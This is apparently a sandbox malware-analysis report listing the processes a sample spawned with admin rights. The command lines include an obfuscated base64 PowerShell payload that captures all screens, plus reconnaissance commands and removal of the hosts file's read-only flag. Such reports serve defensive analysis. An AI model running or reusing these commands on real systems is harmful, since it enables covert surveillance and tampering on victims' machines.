Commandline:	C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
Imagebase:	0x7ff7b3670000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	95
Start time:	15:01:20
Start date:	07/01/2025
Path:	C:\Windows\System32\systeminfo.exe
Wow64 process (32bit):	false
Commandline:	systeminfo
Imagebase:	0x7ff657250000
File size:	110'080 bytes
MD5 hash:	EE309A9C61511E907D87B10EF226FDCD
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	96
Start time:	15:01:20
Start date:	07/01/2025
Path:	C:\Windows\System32\tree.com
Wow64 process (32bit):	false
Commandline:	tree /A /F
Imagebase:	0x7ff6d1340000
File size:	20'992 bytes
MD5 hash:	9EB969EF56718A6243BF60350CD065F0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	97
Start time:	15:01:20
Start date:	07/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	98
Start time:	15:01:20
Start date:	07/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	99
Start time:	15:01:20
Start date:	07/01/2025
Path:	C:\Windows\System32\reg.exe
Wow64 process (32bit):	false
Commandline:	REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
Imagebase:	0x7ff697290000
File size:	77'312 bytes
MD5 hash:	227F63E1D9008B36BDBCC4B397780BE4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	100
Start time:	15:01:21
Start date:	07/01/2025
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
Imagebase:	0x7ff788560000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	101
Start time:	15:01:21
Start date:	07/01/2025
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "tree /A /F"
Imagebase:	0x7ff7b3670000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Analysis Process: conhost.exePID: 7200, Parent PID: 1076

General

Target ID:	102
Start time:	15:01:21
Start date:	07/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	103
Start time:	15:01:21
Start date:	07/01/2025
Path:	C:\Windows\System32\tree.com
Wow64 process (32bit):	false
Commandline:	tree /A /F
Imagebase:	0x7ff6d1340000
File size:	20'992 bytes
MD5 hash:	9EB969EF56718A6243BF60350CD065F0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	104
Start time:	15:01:23
Start date:	07/01/2025
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "getmac"
Imagebase:	0x7ff7b3670000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	105
Start time:	15:01:23
Start date:	07/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	106
Start time:	15:01:23
Start date:	07/01/2025
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "tree /A /F"
Imagebase:	0x7ff7b3670000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Analysis Process: cmd.exePID: 3612, Parent PID: 1420

General

Target ID:	107
Start time:	15:01:23
Start date:	07/01/2025
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"
Imagebase:	0x7ff7b3670000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	108
Start time:	15:01:23
Start date:	07/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	109
Start time:	15:01:23
Start date:	07/01/2025
Path:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\sywb4geu\sywb4geu.cmdline"
Imagebase:	0x7ff646510000
File size:	2'759'232 bytes
MD5 hash:	F65B029562077B648A6A5F6A1AA76A66
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	110
Start time:	15:01:23
Start date:	07/01/2025
Path:	C:\Windows\System32\tree.com
Wow64 process (32bit):	false
Commandline:	tree /A /F
Imagebase:	0x7ff6d1340000
File size:	20'992 bytes
MD5 hash:	9EB969EF56718A6243BF60350CD065F0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	179
Start time:	15:01:26
Start date:	07/01/2025
Path:	C:\Windows\System32\Conhost.exe
Wow64 process (32bit):
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	184
Start time:	15:01:27
Start date:	07/01/2025
Path:	C:\Windows\System32\Conhost.exe
Wow64 process (32bit):
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	209
Start time:	15:01:38
Start date:	07/01/2025
Path:	C:\Windows\System32\Conhost.exe
Wow64 process (32bit):
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	224
Start time:	15:01:41
Start date:	07/01/2025
Path:	C:\Windows\System32\Conhost.exe
Wow64 process (32bit):
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Function 05EE0E98 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1717248259.0000000005EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05EE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5ee0000_47SXvEQ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 77f93baac8891064aa652cce9346632065bf8bfe921989d8c7de6e6d188997ab
Instruction ID: 2a028c55004cb40217cd8af872f8884d771fab29aca1b765da1e61380c8440f1
Opcode Fuzzy Hash: 77f93baac8891064aa652cce9346632065bf8bfe921989d8c7de6e6d188997ab
Instruction Fuzzy Hash: 9DE0DFBB26C025AE6A45C9462B188F6272FE2D5330720A027F887C1214E2E60E79E171

Function 05F00F12 Relevance: 1.3, Strings: 1, Instructions: 61COMMON

Download Yara Rule

Strings

P, xrefs: 05F00F51

Memory Dump Source

Source File: 00000000.00000002.1717289636.0000000005F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 05F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5f00000_47SXvEQ.jbxd

Similarity

API ID:
String ID: P
API String ID: 0-3110715001
Opcode ID: 2f5c520591e353e449170fdf355375ef8e94d9691e2abcdbc19ff44696ae6ccf
Instruction ID: ccc16c3a7c6c848886f3bf00e748afcbcff05a61ab8d0f06af4808def86387e1
Opcode Fuzzy Hash: 2f5c520591e353e449170fdf355375ef8e94d9691e2abcdbc19ff44696ae6ccf
Instruction Fuzzy Hash: 67F062EB14C2506CB301C1522B6CBF75B2FE4D27323799867F80AC4986D68D4B5E7132

Function 05F00E30 Relevance: .1, Instructions: 104COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1717289636.0000000005F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 05F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5f00000_47SXvEQ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bd95002929cfc74b439b25dcb654d86997ed23a28e2ae4e7d60cd070050ed5d3
Instruction ID: d660e5ec1d6a70f7cf4ebdf88af1dc57c16b4318efcb5039198453f612b793bb
Opcode Fuzzy Hash: bd95002929cfc74b439b25dcb654d86997ed23a28e2ae4e7d60cd070050ed5d3
Instruction Fuzzy Hash: 6011D6AB25D152BD7201C4862B2CFFB522FE1D67313B9A826F80BD5582DA9C4A5A3031

Function 05F00E40 Relevance: .1, Instructions: 96COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1717289636.0000000005F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 05F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5f00000_47SXvEQ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 47ff4cf79e02651f5a9aad0af3280425ffcac651c9c004c7f077e662af0edd16
Instruction ID: 76a318738cd7e03dbc71f6738ac6f64b6d34ff4d2babd8f300944d91adf8e120
Opcode Fuzzy Hash: 47ff4cf79e02651f5a9aad0af3280425ffcac651c9c004c7f077e662af0edd16
Instruction Fuzzy Hash: C711C5EB25D152BC7201C0862B2CFFB522FE1D67313B8A826F80BD5586DB9C4B4A3031

Function 05F00E69 Relevance: .1, Instructions: 94COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1717289636.0000000005F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 05F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5f00000_47SXvEQ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c0982fa75b86af8f0ca29dc62c16eb703e7d41f3536ec9a4f5de1d5850b714de
Instruction ID: 6b04c08bec24f5f75f9e16a67959e4be1897c08e9b9d07eafc25e7f89b605f8a
Opcode Fuzzy Hash: c0982fa75b86af8f0ca29dc62c16eb703e7d41f3536ec9a4f5de1d5850b714de
Instruction Fuzzy Hash: 2001E5EB25D156BC7201C0822B5CFFB522FE0D67313B8A826F84BD5582DB9C4B8A3071

Function 05F00ED6 Relevance: .1, Instructions: 93COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1717289636.0000000005F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 05F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5f00000_47SXvEQ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3a24de80bff61d58ac15ef8ade9e80033b91df5f53a45ed45446f10f62c689ea
Instruction ID: e5524161bcf82f79886554ac27390d6855a343e1beabefd5c3335d392beac4aa
Opcode Fuzzy Hash: 3a24de80bff61d58ac15ef8ade9e80033b91df5f53a45ed45446f10f62c689ea
Instruction Fuzzy Hash: CD11A0AB20D292ADA301C0952B1CFFB6B1FE5C67313B8A827F447D55C2DA8C474A7170

Function 05F00E4E Relevance: .1, Instructions: 93COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1717289636.0000000005F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 05F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5f00000_47SXvEQ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4a7b9cf83c0d1bf2ccd2781cda391aa2eadde171144ef9309952efca71d8026b
Instruction ID: 610c1ce2570c9c11e7e224c3523020b91d70e851893fb0f2cbf757df160d1ef2
Opcode Fuzzy Hash: 4a7b9cf83c0d1bf2ccd2781cda391aa2eadde171144ef9309952efca71d8026b
Instruction Fuzzy Hash: 1A0105AB21D112BC7201C4862B1CFFB522FE0D67313B8E826F80BD5586EA9C5B4A3171

Function 05F00EFC Relevance: .1, Instructions: 83COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1717289636.0000000005F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 05F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5f00000_47SXvEQ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 46dc8e9ff736c55a5179d4469849465d1955fd449eb4ae5c4f912c55f446bee2
Instruction ID: bcd98ea6c8269a19005353a4576dec99b2f8f168d1c45f17da99f3fc8a7236f9
Opcode Fuzzy Hash: 46dc8e9ff736c55a5179d4469849465d1955fd449eb4ae5c4f912c55f446bee2
Instruction Fuzzy Hash: D5015ADB21D151BCA241C1562A2CBF75B2FE0D26723B8B827F44BD5582DA8D4B4A7131

Function 05EE0E54 Relevance: .1, Instructions: 82COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1717248259.0000000005EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05EE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5ee0000_47SXvEQ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dff4333fdc6b651554b84578ff8b3b273c0e06c78ebadb7a6a825bd0ca65f187
Instruction ID: 11a9ae8c979a5e0071505adb14e9b7ce73c42ba4fc8534bf971ac787e10f40b7
Opcode Fuzzy Hash: dff4333fdc6b651554b84578ff8b3b273c0e06c78ebadb7a6a825bd0ca65f187
Instruction Fuzzy Hash: B9117D775682615FDF02DDA1564C5F73B27F793330720602BF8C285461E3954856D2B0

Function 05F00E92 Relevance: .1, Instructions: 81COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1717289636.0000000005F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 05F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5f00000_47SXvEQ.jbxd

